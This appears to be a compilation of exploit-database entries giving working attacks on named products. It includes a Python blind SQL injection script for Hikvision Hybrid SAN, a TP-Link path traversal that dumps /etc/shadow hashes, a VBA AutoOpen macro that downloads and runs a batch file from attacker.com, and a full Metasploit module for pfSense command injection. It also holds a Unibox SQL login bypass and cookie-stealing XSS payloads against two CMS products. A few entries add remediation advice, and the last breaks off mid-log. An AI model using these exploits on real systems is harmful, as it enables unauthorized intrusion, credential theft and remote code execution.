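Some Hikvision Hybrid SAN products were vulnerable to multiple remote code execution vulnerabilities such as command injection, Blind SQL injection, HTTP request smuggling, and reflected cross-site scripting. This resulted in remote code execution that allows an adversary to execute arbitrary operating system commands and more. However, an adversary must be on the same network to leverage this vulnerability to execute arbitrary commands.

Vulnerability description:
A manual test confirmed that the downloadtype parameter was vulnerable to Blind SQL injection. I created a Python script to automate and enumerate SQL versions as the application was behind the firewall and blocked all the requests from SQLmap.

Request Body:

GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close

POC:
'''
import sys
import time
import requests

# Target endpoint. Accepts an override on the command line so the placeholder
# does not have to be edited in place.
url = sys.argv[1] if len(sys.argv) > 1 else "http://X.X.X.X:2004/web/log/dynamic_log.php"

# The original always routed through a local Burp listener and failed outright
# when none was running; pass proxies=None to send requests directly.
PROXIES = {
    'http': 'http://localhost:8080',
    'https': 'http://localhost:8080',
}

HEADERS = {
    'Accept-Encoding': 'gzip, deflate',
    'Accept': '*/*',
    'Accept-Language': 'en',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',
    'Connection': 'close'
}


# Function to check if the response time is greater than the specified delay
def is_response_time_delayed(response_time, delay):
    """Return True when *response_time* (seconds) is at least *delay* seconds."""
    return response_time >= delay


# Function to perform blind SQL injection and check the response time
def perform_blind_sql_injection(payload, sleep_time=10, proxies=PROXIES):
    """Send *payload* in ``downloadtype`` and report whether the reply was delayed.

    *sleep_time* is the delay the payload asks the database for and is the
    detection threshold. The original compared against a fixed 20 s while its
    payloads slept for 10 s, so a hit was only counted if the server somehow
    doubled the delay (or the network added ten seconds of latency); with the
    threshold equal to the requested sleep a doubled delay is still caught.
    """
    params = {
        'target': 'makeMaintainLog',
        'downloadtype': payload
    }
    start_time = time.time()
    # Bound the wait so a hung target cannot stall the scan, but leave enough
    # headroom that a legitimately delayed reply still arrives.
    response = requests.get(url, headers=HEADERS, params=params, proxies=proxies,
                            timeout=sleep_time * 3 + 5)
    response_time = time.time() - start_time
    return is_response_time_delayed(response_time, sleep_time)


# Enumerate the MySQL version
def enumerate_mysql_version(max_len=10, sleep_time=10, charset=range(32, 127)):
    """Recover @@version one character at a time via time-based blind injection.

    For each position, candidate byte values from *charset* are tried until one
    delays the response; that character is appended and the next position
    starts. The original tried all 256 values for every one of ten positions
    with no early exit and, because ASCII(SUBSTRING(...)) is 0 past the end of
    the string, appended NUL characters once the version ran out. Here a
    position with no hit ends the scan (end of string, or the injection no
    longer works - either way there is nothing more to read).

    Returns the recovered prefix of @@version, possibly empty.
    """
    version_Name = ''
    for i in range(1, max_len + 1):
        hit = None
        for mid in charset:
            payload = (f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid}, "
                       f"SLEEP({sleep_time}), 0))-- -")
            if perform_blind_sql_injection(payload, sleep_time):
                hit = chr(mid)
                break
        if hit is None:
            break
        version_Name += hit
        # Progress: each character costs up to len(charset) delayed requests.
        print("so far:", version_Name, file=sys.stderr)
    return version_Name


if __name__ == "__main__":
    # Enumeration is completed
    version_Name = enumerate_mysql_version()
    print("MySQL version is:", version_Name)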
-
TP-Link TL-WR740N - Authenticated Directory Traversal
# Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal # Date: 13/7/2023 # Exploit Author: Anish Feroz (Zeroxinn) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N ---------------------------POC--------------------------- Request ------- GET /help/../../../etc/shadow HTTP/1.1 Host: 192.168.0.1:8082 Authorization: Basic YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Response -------- HTTP/1.1 200 OK Server: Router Webserver Connection: close WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" Content-Type: text/html <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> <HTML> <HEAD><TITLE>TL-WR740N</TITLE> <META http-equiv=Pragma content=no-cache> <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"> <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"> <SCRIPT language="javascript" type="text/javascript"><!-- if(window.parent == window){window.location.href="http://192.168.0.1";} function Click(){ return false;} document.oncontextmenu=Click; function doPrev(){history.go(-1);} //--></SCRIPT> root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: bin::10933:0:99999:7::: daemon::10933:0:99999:7::: adm::10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody::10933:0:99999:7::: ap71::10933:0:99999:7:::
-
Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.
## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.
## Author: nu11secur1ty
## Date: 07.18.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office
## Reference: https://portswigger.net/web-security/access-control
## CVE-2023-33148
## Description:
The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to Elevation of Privilege. The attacker attaches a malicious Word document to a message in the Outlook app (part of Microsoft Office 365) and tricks the victim into opening it; the document's `AutoOpen` macro then runs a shell command in the background on the local PC. The PoC opens the attachment straight from the mail client without the victim first saving it to disk. Note that the payload is a VBA macro, so it only executes if the document's macros are allowed to run on the victim's machine; what happens next depends on the batch file the macro downloads and runs.
## Status: HIGH Vulnerability
[+]Exploit:
- Exploit Server:
```vb
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat && .\salaries.bat", vbNormalFocus)
End Sub
```
## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)
## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)
## Time spent: 00:35:00
-
pfSense v2.7.0 - OS Command Injection
# Exploit Title: pfSense v2.7.0 - OS Command Injection
#Exploit Author: Emir Polat
# CVE-ID : CVE-2023-27253
#
# Flow of the module: login (index.php form, CSRF token scraped from the page)
# -> check (version string on index.php) -> drop_config (export the RRD data
# XML through diag_backup.php) -> exploit (re-import that XML with the
# <filename> replaced by a quote-breaking shell injection carrying the
# payload). Needs a web-GUI account with the Backup & Restore privilege; the
# command runs as root according to the description.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'pfSense Restore RRD Data Command Injection',
        'Description' => %q{
          This module exploits an authenticated command injection vulnerabilty in the "restore_rrddata()"
          function of pfSense prior to version 2.7.0 which allows an authenticated attacker with the
          "WebCfg - Diagnostics: Backup & Restore" privilege to execute arbitrary operating system commands
          as the "root" user. This module has been tested successfully on version 2.6.0-RELEASE.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Emir Polat', # vulnerability discovery & metasploit module
        ],
        'References' => [
          ['CVE', '2023-27253'],
          ['URL', 'https://redmine.pfsense.org/issues/13935'],
          ['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94']
        ],
        'DisclosureDate' => '2023-03-18',
        'Platform' => ['unix'],
        'Arch' => [ ARCH_CMD ],
        'Privileged' => true,
        'Targets' => [ [ 'Automatic Target', {}] ],
        'Payload' => {
          # "'" is excluded because the payload is spliced into a single-quoted
          # filename (see exploit); "/" presumably because that filename is used
          # as a path component on the target - NOTE(review): confirm against
          # restore_rrddata().
          'BadChars' => "\x2F\x27",
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic netcat'
          }
        },
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # CONFIG_CHANGES: exploit re-imports the target's own exported RRD
          # data (with one filename rewritten), so the restore is not a no-op.
          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
        }
      )
    )
    # pfSense factory defaults; real targets will need these set.
    register_options [
      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense'])
    ]
  end

  # Vulnerability check: requires working credentials (Unknown otherwise),
  # confirms diag_backup.php is reachable for this account, then compares the
  # version parsed from index.php against the fixed release.
  def check
    unless login
      return Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!")
    end

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
      'method' => 'GET',
      'keep_cookies' => true
    )
    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
    return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

    # A 200 without the page title means the account lacks the Backup & Restore
    # privilege (or the page differs), so the vulnerable function is not reachable.
    unless res&.body&.include?('Diagnostics: ')
      return Exploit::CheckCode::Safe('Vulnerable module not reachable')
    end

    version = detect_version
    unless version
      return Exploit::CheckCode::Detected('Unable to get the pfSense version')
    end

    unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE')
      return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected")
    end

    Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!")
  end

  # POST the login form with its CSRF token; a 302 is taken as success and the
  # session cookie is retained via keep_cookies. Returns true/false and caches
  # the result in @logged_in.
  def login
    # Skip the login process if we are already logged in.
    return true if @logged_in

    csrf = get_csrf('index.php', 'GET')
    unless csrf
      print_error('Could not get the expected CSRF token for index.php when attempting login!')
      return false
    end

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'POST',
      'vars_post' => {
        '__csrf_magic' => csrf,
        'usernamefld' => datastore['USERNAME'],
        'passwordfld' => datastore['PASSWORD'],
        'login' => ''
      },
      'keep_cookies' => true
    )
    if res && res.code == 302
      @logged_in = true
      true
    else
      false
    end
  end

  # Scrape the version string from the dashboard. Returns e.g. "2.6.0-RELEASE"
  # or nil. The regex only accepts "<digits/dots>-RELEASE" immediately before
  # </strong>, so builds with a different suffix (patch levels, non-RELEASE
  # strings) yield nil and check() falls back to Detected.
  def detect_version
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'GET',
      'keep_cookies' => true
    )
    # If the response isn't a 200 ok response or is an empty response, just return nil.
    unless res && res.code == 200 && res.body
      return nil
    end

    # A regex literal on the left of =~ binds the named capture as local "version".
    if (%r{Version.+<strong>(?<version>[0-9.]+-RELEASE)\n?</strong>}m =~ res.body).nil?
      nil
    else
      version
    end
  end

  # Fetch +uri+ with HTTP method +methods+ and return the csrfMagicToken value
  # embedded in its JavaScript, or nil when the page or token is missing.
  def get_csrf(uri, methods)
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, uri),
      'method' => methods,
      'keep_cookies' => true
    )
    unless res && res.body
      return nil # If no response was returned or an empty response was returned, then return nil.
    end

    # Try regex match the response body and save the match into a variable named csrf.
    if (/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body).nil?
      return nil # No match could be found, so the variable csrf won't be defined.
    else
      return csrf
    end
  end

  # Export the target's RRD data ("backuparea" = rrddata) through the Backup &
  # Restore form. Returns the XML body when it contains <rrddatafile>, else nil.
  # Fails the module if no CSRF token can be obtained.
  def drop_config
    csrf = get_csrf('diag_backup.php', 'GET')
    unless csrf
      fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!')
    end

    post_data = Rex::MIME::Message.new
    post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
    post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
    post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"')
    post_data.add_part('', nil, nil, 'form-data; name="restorearea"')
    post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"')
    post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'data' => post_data.to_s,
      'keep_cookies' => true
    )
    if res && res.code == 200 && res.body =~ /<rrddatafile>/
      return res.body
    else
      return nil
    end
  end

  # Re-import the exported RRD XML with the first <filename> replaced by
  # "WAN_DHCP-quality.rrd';<payload>;" so the quote closes the filename where
  # restore_rrddata() builds its shell command and the payload runs after it.
  def exploit
    unless login
      fail_with(Failure::NoAccess, 'Could not obtain the login cookies!')
    end

    csrf = get_csrf('diag_backup.php', 'GET')
    unless csrf
      fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!')
    end

    config_data = drop_config
    if config_data.nil?
      fail_with(Failure::UnexpectedReply, 'The drop config response was empty!')
    end

    # Named capture "file" is bound as a local by the =~ with the literal on the left.
    if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil?
      fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!')
    end

    # Spaces in the whole document are swapped for ${IFS} - presumably because
    # the restore path hands the data to a shell and a literal space would end
    # the injected command early. NOTE(review): "file" was captured before this
    # substitution, so a filename containing a space would no longer match below.
    config_data.gsub!(' ', '${IFS}')
    send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};")

    post_data = Rex::MIME::Message.new
    post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
    post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
    post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"')
    post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"')
    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
    post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"')
    post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"")
    post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
    post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"')

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'data' => post_data.to_s,
      'keep_cookies' => true
    )
    # No HTTP response is the expected outcome: presumably the injected command
    # (a netcat shell) holds the request open until the client times out.
    if res
      print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.")
    end
  end
end
-
Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection
# Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection # Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0" # Date: 07/2023 # Exploit Author: Ansh Jain @sudoark # Author Contact : arkinux01@gmail.com # Vendor Homepage: https://www.wifi-soft.com/ # Software Link: https://www.wifi-soft.com/products/unibox-hotspot-controller.php # Version: Unibox Administration 3.0 & 3.1 # Tested on: Microsoft Windows 11 # CVE : CVE-2023-34635 # CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635 The Wifi Soft Unibox Administration 3.0 and 3.1 login page is vulnerable to SQL injection, which allows an unauthenticated attacker to obtain administrator access. The username field is embedded in the authentication query without parameterisation or escaping: the payload `'or 1=1 limit 1-- -` closes the string literal, turns the WHERE clause into a tautology and comments out the remainder of the query, so the query returns the first account row (typically the administrator) regardless of the password supplied. The captcha is not a mitigation, since a single valid submission is all the attack requires. Remediation is to issue the login query with prepared statements (bound parameters) instead of string concatenation, and to compare the password against the returned row rather than treating any returned row as an authenticated user. ## How to Reproduce Step 1 : Visit the login page and check the version, whether it is 3.0, 3.1, or not. Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and enter any random password. Step 3 : Fill in the captcha and hit login. After hitting login, you have been successfully logged in as an administrator and can see anyone's user data, modify data, revoke access, etc. 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Login Request -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------- Parameters: username, password, captcha, action ----------------------------------------------------------------------------------------------------------------------- POST /index.php HTTP/2 Host: 255.255.255.255.host.com Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 83 Origin: https://255.255.255.255.host.com Referer: https://255.255.255.255.host.com/index.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Login Response -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- HTTP/2 302 Found Server: nginx Date: Tue, 18 Jul 2023 13:32:14 GMT Content-Type: text/html; charset=UTF-8 Location: ./dashboard/dashboard Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: 
no-store, no-cache, must-revalidate Pragma: no-cache -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Successful Loggedin Request -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- GET /dashboard/dashboard HTTP/2 Host: 255.255.255.255.host.com Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://255.255.255.255.host.com/index.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Successful Loggedin Response -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- HTTP/2 200 OK Server: nginx Date: Tue, 18 Jul 2023 13:32:43 GMT Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Cache_control: private <!DOCTYPE html> <html lang="en"> html content </html>
-
Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities
# Exploit Title: Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities References (Source): https://www.vulnerability-lab.com/get_content.php?id=2278 Release Date: 2023-07-04 Vulnerability Laboratory ID (VL-ID): 2278 Common Vulnerability Scoring System: 5.4 Product & Service Introduction: =============================== https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432 Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application. Affected Product(s): ==================== ActiveITzone Product: Active Super Shop CMS v2.5 (CMS) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-08-20: Researcher Notification & Coordination (Security Researcher) 2021-08-21: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2023-07-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application. The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content. The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module. 
Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Manage Details Vulnerable Parameter(s): [+] name [+] phone [+] address Affected Module(s): [+] manage profile [+] products branding Proof of Concept (PoC): ======================= The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Exploitation: Payload <img src="https://[DOMAIN]/[PATH]/[PICTURE].*"> Vulnerable Source: manage_admin & branding <div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;"> <div class="panel-heading"> <h3 class="panel-title">Manage Details</h3> </div> <form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/" class="form-horizontal" method="post" accept-charset="utf-8"> <div class="panel-body"> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-1">Name</label> <div class="col-sm-6"> <input type="text" name="name" value="Mr. 
Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required"> </div></div> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-2">Email</label> <div class="col-sm-6"> <input type="email" name="email" value="accountant@shop.com" id="demo-hor-2" class="form-control required"> </div></div> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-3"> Phone</label> <div class="col-sm-6"> <input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control"> </div></div> --- PoC Session Logs (POST) --- https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/ Host: assm_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html, */*; q=0.01 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680 Content-Length: 902 Origin:https://assm_cms.localhost:8080 Connection: keep-alive Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/ Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1 - POST: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly https://assm_cms.localhost:8080/shop/admin/manage_admin/ Host: assm_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Reference(s): https://assm_cms.localhost:8080/shop/ https://assm_cms.localhost:8080/shop/admin/ https://assm_cms.localhost:8080/shop/admin/manage_admin/ https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/ Solution - Fix & Patch: ======================= 
Reject or escape HTML in the name, address and phone fields on submission, and HTML-entity-encode these values wherever they are rendered (the manage-profile view and the products branding listing) so stored markup cannot be interpreted by the browser. Output encoding is the essential control here, because input entered by a low-privileged accountant is rendered in backend pages viewed by managers and admins. Security Risk: ============== The security risk of the html injection web vulnerabilities in the shopping web-application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
-
Boom CMS v8.0.7 - Cross Site Scripting
# Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting References (Source): https://www.vulnerability-lab.com/get_content.php?id=2274 Release Date: 2023-07-03 Vulnerability Laboratory ID (VL-ID): 2274 Product & Service Introduction: =============================== Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content. It gives editors control but doesn't require any technical knowledge. (Copy of the Homepage:https://www.boomcms.net/boom-boom ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application. Affected Product(s): ==================== UXB London Product: Boom v8.0.7 - Content Management System (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-07-24: Researcher Notification & Coordination (Security Researcher) 2022-07-25: Vendor Notification (Security Department) 2023-**-**: Vendor Response/Feedback (Security Department) 2023-**-**: Vendor Fix/Patch (Service Developer Team) 2023-**-**: Security Acknowledgements (Security Department) 2023-07-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application. 
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector, compromising browser-to-web-application requests from the application side. The vulnerability is located in the album title and album description input fields of the asset-manager module. Attackers with low privileges are able to add malformed albums with malicious script code in the title and description. After injection the albums are displayed in the backend, where the payload executes when the main assets are previewed. The attack vector is persistent and the request method used to inject is PUT/POST (see the JSON request in the session logs below). The only input handling observed is backslash-escaping of single and double quotes, which is an SQL-injection mitigation; it does not neutralise HTML metacharacters such as `<` and `>`, so script payloads that avoid quotes (as the PoC payloads below do) are stored and rendered unencoded. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] assets-manager (album) Vulnerable Function(s): [+] add Vulnerable Parameter(s): [+] title [+] description Affected Module(s): [+] Frontend (Albums) [+] Backend (Albums Assets) Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Login to the application as restricted user 2. Create a new album 3. Inject a test script code payload to title and description 4. Save the request 5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution 6. 
Successful reproduce of the persistent cross site web vulnerability! Payload(s): ><script>alert(document.cookie)</script><div style=1 <a onmouseover=alert(document.cookie)>test</a> --- PoC Session Logs (Inject) --- https://localhost:8000/boomcms/album/35 Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 263 Origin:https://localhost:8000 Connection: keep-alive Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source] Sec-Fetch-Site: same-origin {"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>", "slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by" :null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"} - PUT: HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache, private Set-Cookie: Max-Age=7200; path=/ Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; Max-Age=7200; path=/; httponly Content-Length: 242 Connection: Keep-Alive Content-Type: application/json - https://localhost:8000/boomcms/asset-manager/albums/[evil.source] Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; 